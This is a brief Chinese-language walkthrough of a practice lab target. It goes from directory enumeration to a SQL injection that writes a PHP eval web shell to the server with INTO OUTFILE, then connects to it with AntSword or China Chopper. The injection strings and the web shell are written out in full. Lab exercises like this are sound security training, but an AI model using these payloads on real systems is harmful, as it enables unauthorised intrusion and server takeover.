找到一个目标靶场的IP ， 这里以172.16.1.98 为例

1、使用命令   /robots.txt  来确定目录

2、分别测试两个文件

均无法访问，可返回其根目录查询

3、到根目录，出现搜索框

4、输入ID为1

5、使用虚拟机kali的终端

搜索命令  dirsearch -u http://172.16.1.98/m3diNf0/

6、搜索文件 info.php

即可得到  WWW 所在的根目录

7、确定闭合方式  1' #

8、确定字段

1' order by 3#

9、注入一句话“木马”

1' union select 1,2 ,'<?php @eval($_POST['cmd']);?>' into outfile '绝对路径' #

9、查看文件，木马是否注入成功

搜索  /s   /up    /sis.php

10、使用中国蚁键/中国菜刀等工具，进入该系统

即可成功获取信息

安全

网络安全人人有责，切勿知法犯法